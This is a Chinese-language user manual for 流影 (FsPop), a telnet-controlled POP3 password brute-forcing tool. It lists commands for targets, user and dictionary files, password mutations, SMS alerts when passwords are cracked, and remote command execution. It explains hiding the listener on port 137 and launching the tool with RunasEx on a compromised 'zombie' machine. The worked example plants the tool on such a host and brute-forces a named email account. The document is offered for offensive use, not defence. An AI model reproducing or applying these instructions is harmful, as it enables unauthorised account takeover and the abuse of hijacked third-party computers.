流影使用说明

一、流影简介流影是一个和流光功能相似的工具，和流光最大的不同在于，流光是运行于用户主机也就是客户端的，是一个图形界面的工具，而流影可以同时运行于服务器端和客户端的工具。用户可以通过telnet来进行远程管理和控制。二、控制命令流影的全部设置通过Telnet来进行，采用命令行方式。Set Server <POP3 Server> 设置探测的POP3服务器，如：Set Server pop.21cn.comSet User <Username>|<File: User List File>|<Scheme: User Scheme File> 设置需要探测的用户名、用户列表文件或用户方案文件，关于用户列表文件及用户方案文件的详细解释参阅[流光]的说明文件。如：Set User Victim, Set User File:c:\password.dic, Set User Scheme: user.schSet Password <Password>|<Dictionary File>|<Dictionary Scheme File> 设置探测时采用的密码、密码字典或密码程序方案。如：Set Password 123456, Set Password File: Password.dic, Set Password Scheme: Pass.SchRun 开始探测Stat 查看当前运行的情况Set Singlemode <ON>|<OFF> 开启/关闭简单模式，如果简单模式开启会自动用相同的用户名作为密码探测一次。Show Result <Current>|<Total> 查看已经探测出的本次密码或所有密码记录Stop 停止当前探测。Set Suffix <NULL>|<Suffix Word> 设置是否自动在每一个密码后加指定的后缀。如：Set Suffix 123，即在每一个密码后自动加后缀123。Ex:pass->pass123Set Prefix <NULL>|<Prefix Word> 设置是否自动在每一个密码后加指定的前缀。如：Set Prefix 123，即在每一个密码前自动加前缀123，Ex:pass->123passSet Gsm <NULL>|<GSM ID> ET:<Freq> 设置需要发送短消息的手机号码。如：Set GSM 13900101234 ET00，设置号码为13900101234，每探测出100个密码及发送一次。注意：必须是中国移动的手机，而且已经开通了短信息服务。Set Sms <Message> 短消息发送，用于测试短消息的发送，发送的号码为Set Gsm指定的号码。Change Password <New Password> 改变登陆的密码Cmd [/display] <Cmd> 执行制定的程序，[display]选项用于指定是否显示执行的输出结果。如：Cmd /display dirQuit 退出Telnet控制端。ShutDown 结束流影的运行。三、启动如果是在本地运行，直接键入如下命令即可：FsPop.exe <Port> <Control Password> [/Verbose]Port: 流影开启的端口，此端口可以和已经开启的端口重用，例如和端口137重用。Control Password: 每一次用Telnet连接流影时的密码，最多8位。/Verbose: 本地输出模式，如果打开此选项，可以在运行时看到扫描的过程，不建议在远程使用。如果在远程启动，首先用SRV开启的端口登陆，之后需要用RunasEx来创建流影的进程，如：RunasEx administrator password "c:\winnt\system32\FsPop.exe 137 123456" 建议在本地使用熟练后，再放到远程运行。四、一个典型的例子第一部需要做的当然是搞到一部肉鸡，经过用[流光2000]的探测，我们找到了一个肉鸡192.168.16.1（为了便于举例，此处是我在局域网中一台机器）。1、复制一些必要的文件上去2、启动srv进程，登陆3、利用RunasEx创建Fspop.exe进程从上面可以看到，进程创建成功。现在我们可以来控制流影作一些事情了。我们需要破解一个帐号fybugang12@21cn.com(纯属虚构，请勿对号入座)，在一般的字典破解无效后，决定采用一个比较大的方案来暴力破解，方案的文件名为user.sch，是2个字母加4个数字的组合。首先Telnet到流影开启的端口，在这个例子中是137，详细过程参见下图。需要说明的一点是，由于我们仅仅设定了一个用户，所以在设定手机短信息的发送频率时设为1，即ET：1，也就是说一旦扫描成功，就通过短信息通知。从上面用Stat命令可以看出，完成这一次扫描最多需要676万次探测，通常在远程的扫描速度可以达到100万次/天，也就是说可以在一周内完成。当开始扫描后，我们就可以不必理会了，因为这一切都是在服务器上进行的。------------------